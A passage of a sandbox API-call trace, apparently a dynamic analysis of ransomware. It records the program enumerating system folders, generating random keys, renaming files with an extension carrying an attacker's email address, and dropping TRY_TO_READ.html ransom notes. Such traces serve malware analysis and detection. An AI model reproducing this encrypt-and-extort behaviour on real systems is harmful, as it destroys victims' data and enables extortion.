	[0052.043] lstrcatW (in: lpString1="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR"
	[0052.044] MoveFileExW (lpExistingFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0052.044] CreateFileW (lpFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0052.044] GetProcessHeap () returned 0x540000
	[0052.044] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.044] CloseHandle (hObject=0xffffffff) returned 0
	[0052.044] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.044] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.044] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.044] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.044] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a58f0 | out: hHeap=0x540000) returned 1
	[0052.044] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5918 | out: hHeap=0x540000) returned 1
	[0052.044] FindFirstFileW (in: lpFileName="C:\\\\Boot\\zh-TW\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9cfc8b0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cfc8b0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575720
	[0052.044] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.044] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.044] GetLastError () returned 0x6
	[0052.044] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.044] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.044] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.045] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a58f0
	[0052.045] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575760
	[0052.045] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575760 | out: hHeap=0x540000) returned 1
	[0052.045] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.045] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.045] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a58f0 | out: hHeap=0x540000) returned 1
	[0052.045] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.045] FindNextFileW (in: hFindFile=0x575720, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9cfc8b0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cfc8b0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0052.045] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.045] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.045] GetLastError () returned 0x6
	[0052.045] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.045] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.045] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.045] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a58f0
	[0052.045] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575760
	[0052.045] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575760 | out: hHeap=0x540000) returned 1
	[0052.045] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.045] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.045] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a58f0 | out: hHeap=0x540000) returned 1
	[0052.045] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.045] FindNextFileW (in: hFindFile=0x575720, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0052.045] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.045] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.045] GetLastError () returned 0x6
	[0052.045] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a58f0
	[0052.045] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.045] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.045] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.045] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.046] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a58f0 | out: hHeap=0x540000) returned 1
	[0052.046] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.046] FindNextFileW (in: hFindFile=0x575720, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cfc8b0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9cfc8b0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cfc8b0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0052.046] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.046] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.046] GetLastError () returned 0x6
	[0052.046] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.046] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0052.046] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.046] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.046] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0052.046] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.046] FindNextFileW (in: hFindFile=0x575720, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cfc8b0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9cfc8b0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cfc8b0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0052.046] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.046] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b7d28
	[0052.046] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596750
	[0052.046] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b7d28 | out: pbBuffer=0x5b7d28) returned 1
	[0052.046] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596750 | out: pbBuffer=0x596750) returned 1
	[0052.046] SetFileAttributesW (lpFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0
	[0052.046] lstrlenW (lpString="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui") returned 30
	[0052.046] GetProcessHeap () returned 0x540000
	[0052.046] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa2) returned 0x5919d0
	[0052.046] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui") returned="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui"
	[0052.046] lstrcatW (in: lpString1="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR"
	[0052.046] MoveFileExW (lpExistingFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0052.046] CreateFileW (lpFileName="C:\\\\Boot\\zh-TW\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0052.047] GetProcessHeap () returned 0x540000
	[0052.047] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.047] CloseHandle (hObject=0xffffffff) returned 0
	[0052.047] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.047] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.047] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.047] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.047] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5839c0 | out: hHeap=0x540000) returned 1
	[0052.047] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596eb8 | out: hHeap=0x540000) returned 1
	[0052.047] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9d48b70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9d48b70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575760
	[0052.047] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.047] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.047] GetLastError () returned 0x6
	[0052.047] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x5839c0
	[0052.047] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.047] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.047] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596d50
	[0052.047] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5757a0
	[0052.047] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5757a0 | out: hHeap=0x540000) returned 1
	[0052.047] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.047] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.047] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596d50 | out: hHeap=0x540000) returned 1
	[0052.047] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5839c0 | out: hHeap=0x540000) returned 1
	[0052.047] FindNextFileW (in: hFindFile=0x575760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9d48b70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9d48b70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0052.048] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.048] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.048] GetLastError () returned 0x6
	[0052.048] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x5839c0
	[0052.048] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.048] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.048] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596d50
	[0052.048] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5757a0
	[0052.048] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5757a0 | out: hHeap=0x540000) returned 1
	[0052.048] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.049] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.049] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596d50 | out: hHeap=0x540000) returned 1
	[0052.049] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5839c0 | out: hHeap=0x540000) returned 1
	[0052.049] FindNextFileW (in: hFindFile=0x575760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9d48b70, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9d48b70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9d48b70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0052.049] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.049] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.049] GetLastError () returned 0x6
	[0052.049] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588d60
	[0052.049] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.049] GetLastError () returned 0x6
	[0052.049] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x5839c0
	[0052.049] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.049] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.049] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.049] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.049] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5839c0 | out: hHeap=0x540000) returned 1
	[0052.049] FindNextFileW (in: hFindFile=0x575760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1
	[0052.049] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0052.049] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.049] GetLastError () returned 0x6
	[0052.049] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588d60
	[0052.049] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.049] GetLastError () returned 0x6
	[0052.049] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5a1038
	[0052.049] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5832a8
	[0052.049] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a1038 | out: hHeap=0x540000) returned 1
	[0052.049] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0052.049] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588de8
	[0052.049] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596d50
	[0052.049] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588e70
	[0052.049] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596760
	[0052.049] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596770
	[0052.050] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.050] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588ef8
	[0052.050] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.050] GetLastError () returned 0x6
	[0052.050] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5919d0
	[0052.050] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588ef8 | out: hHeap=0x540000) returned 1
	[0052.050] GetLastError () returned 0x6
	[0052.050] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598d40
	[0052.050] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444
	[0052.052] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
	[0052.052] WriteFile (in: hFile=0x444, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0052.053] WriteFile (in: hFile=0x444, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0052.053] WriteFile (in: hFile=0x444, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0052.053] CloseHandle (hObject=0x444) returned 1
	[0052.053] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.053] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0052.053] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0052.053] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588e70 | out: hHeap=0x540000) returned 1
	[0052.053] FindNextFileW (in: hFindFile=0x575760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0018-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~2")) returned 1
	[0052.053] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0052.053] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.053] GetLastError () returned 0x0
	[0052.053] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588d60
	[0052.053] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.053] GetLastError () returned 0x0
	[0052.054] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5a1038
	[0052.054] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5832a8
	[0052.054] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a1038 | out: hHeap=0x540000) returned 1
	[0052.054] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0052.054] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588e70
	[0052.054] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596e40
	[0052.054] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588ef8
	[0052.054] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596760
	[0052.054] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596770
	[0052.054] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.054] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588f80
	[0052.054] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.054] GetLastError () returned 0x0
	[0052.054] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5919d0
	[0052.054] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588f80 | out: hHeap=0x540000) returned 1
	[0052.054] GetLastError () returned 0x0
	[0052.054] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598d40
	[0052.054] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444
	[0052.057] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
	[0052.057] WriteFile (in: hFile=0x444, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0052.057] WriteFile (in: hFile=0x444, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
